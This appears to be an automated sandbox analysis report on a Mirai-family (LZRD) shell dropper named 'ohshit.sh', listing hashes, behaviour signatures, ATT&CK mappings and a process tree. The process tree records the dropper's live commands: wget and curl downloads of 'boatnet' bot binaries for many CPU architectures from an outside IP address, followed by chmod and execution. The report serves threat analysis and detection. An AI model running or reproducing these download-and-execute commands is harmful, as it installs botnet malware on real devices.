Analysis
- max time kernel: 13s
- max time network: 15s
- platform: debian-9_armhf
- resource: debian9-armhf-20240729-en
- resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 23-12-2024 05:02
Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: ohshit.sh, Resource: ubuntu1804-amd64-20240611-en)
- Behavioral task: behavioral2 (Sample: ohshit.sh, Resource: debian9-armhf-20240729-en)
- Behavioral task: behavioral3 (Sample: ohshit.sh, Resource: debian9-mipsbe-20240611-en)
General
- Target: ohshit.sh
- Size: 3KB
- MD5: e0ccd217979419469e913cbef10872f3
- SHA1: 6bbef022dcf450af81bee90522e4c82069c84064
- SHA256: 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71
- SHA512: 38402719e384396071ab1f779eb0d67a55570ecfb04018e47cafdfd73ce04984e15c0d2942b446cee5652a449e22a8690812dbe5fd232736cb8a3939531255ce
Malware Config
- Extracted: mirai (LZRD)
- Extracted: mirai (LZRD)
- Extracted: mirai (LZRD)
Signatures
- Mirai family
- File and Directory Permissions Modification (1 TTPs, 15 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Process chmod, pids: 715, 740, 781, 834, 705, 692, 764, 828, 846, 678, 728, 752, 797, 840, 699
- Executes dropped EXE (15 IoCs)
  ioc /tmp/WTF, process WTF, pids: 679, 693, 700, 706, 716, 729, 742, 754, 767, 783, 799, 829, 835, 841, 847
- YARA match
  resource: behavioral2/files/fstream-2.dat, yara_rule: upx
- Checks CPU configuration (1 TTPs, 15 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  File opened for reading: /proc/cpuinfo, process curl (15 occurrences)
- Reads runtime system information
  File opened for reading: /proc/self/auxv, process curl (15 occurrences)
  File opened for reading: /proc/sys/crypto/fips_enabled, process curl (15 occurrences)
- System Network Configuration Discovery (1 TTPs, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid/Process: 681 wget, 686 curl, 691 cat
- Writes file to tmp directory (8 IoCs)
  Malware often drops required files in the /tmp directory.
  File opened for modification: /tmp/WTF (ohshit.sh)
  File opened for modification: /tmp/boatnet.ppc (curl)
  File opened for modification: /tmp/boatnet.spc (wget)
  File opened for modification: /tmp/boatnet.spc (curl)
  File opened for modification: /tmp/boatnet.m68k (wget)
  File opened for modification: /tmp/boatnet.m68k (curl)
  File opened for modification: /tmp/boatnet.sh4 (wget)
  File opened for modification: /tmp/boatnet.sh4 (curl)
Processes (image : command line (PID); matched signatures listed beneath each process)

/tmp/ohshit.sh : /tmp/ohshit.sh (PID 655)
  - Writes file to tmp directory
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.x86 (PID 657)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86 (PID 666)
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat : cat boatnet.x86 (PID 675)
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 678)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 679)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.mips (PID 681)
    - System Network Configuration Discovery
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.mips (PID 686)
    - Checks CPU configuration
    - Reads runtime system information
    - System Network Configuration Discovery
  /bin/cat : cat boatnet.mips (PID 691)
    - System Network Configuration Discovery
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 692)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 693)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.arc (PID 695)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arc (PID 697)
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat : cat boatnet.arc (PID 698)
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 699)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 700)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.i468 (PID 702)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.i468 (PID 703)
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat : cat boatnet.i468 (PID 704)
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 705)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 706)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.i686 (PID 708)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.i686 (PID 709)
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat : cat boatnet.i686 (PID 713)
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 715)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 716)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.x86_64 (PID 719)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86_64 (PID 722)
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat : cat boatnet.x86_64 (PID 726)
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 728)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 729)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.mpsl (PID 732)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.mpsl (PID 735)
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat : cat boatnet.mpsl (PID 739)
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 740)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 742)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.arm (PID 744)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm (PID 747)
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat : cat boatnet.arm (PID 751)
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 752)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 754)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.arm5 (PID 756)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm5 (PID 759)
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat : cat boatnet.arm5 (PID 763)
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 764)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 767)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.arm6 (PID 770)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm6 (PID 773)
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat : cat boatnet.arm6 (PID 780)
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 781)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 783)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.arm7 (PID 786)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm7 (PID 791)
    - Checks CPU configuration
    - Reads runtime system information
  /bin/cat : cat boatnet.arm7 (PID 795)
  /bin/chmod : chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 797)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 799)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.ppc (PID 801)
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.ppc (PID 805)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/cat : cat boatnet.ppc (PID 827)
  /bin/chmod : chmod +x boatnet.ppc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 828)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 829)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.spc (PID 831)
    - Writes file to tmp directory
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.spc (PID 832)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/cat : cat boatnet.spc (PID 833)
  /bin/chmod : chmod +x boatnet.ppc boatnet.spc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 834)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 835)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.m68k (PID 837)
    - Writes file to tmp directory
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.m68k (PID 838)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/cat : cat boatnet.m68k (PID 839)
  /bin/chmod : chmod +x boatnet.m68k boatnet.ppc boatnet.spc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 840)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 841)
    - Executes dropped EXE
  /usr/bin/wget : wget http://154.213.187.234:3000/hiddenbin/boatnet.sh4 (PID 843)
    - Writes file to tmp directory
  /usr/bin/curl : curl -O http://154.213.187.234:3000/hiddenbin/boatnet.sh4 (PID 844)
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/cat : cat boatnet.sh4 (PID 845)
  /bin/chmod : chmod +x boatnet.m68k boatnet.ppc boatnet.sh4 boatnet.spc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF (PID 846)
    - File and Directory Permissions Modification
  /tmp/WTF : ./WTF (PID 847)
    - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Virtualization/Sandbox Evasion (1)
  - System Checks (1)
Downloads
- Filesize: 21KB
- Filesize: 57KB
- Filesize: 53KB
- Filesize: 48KB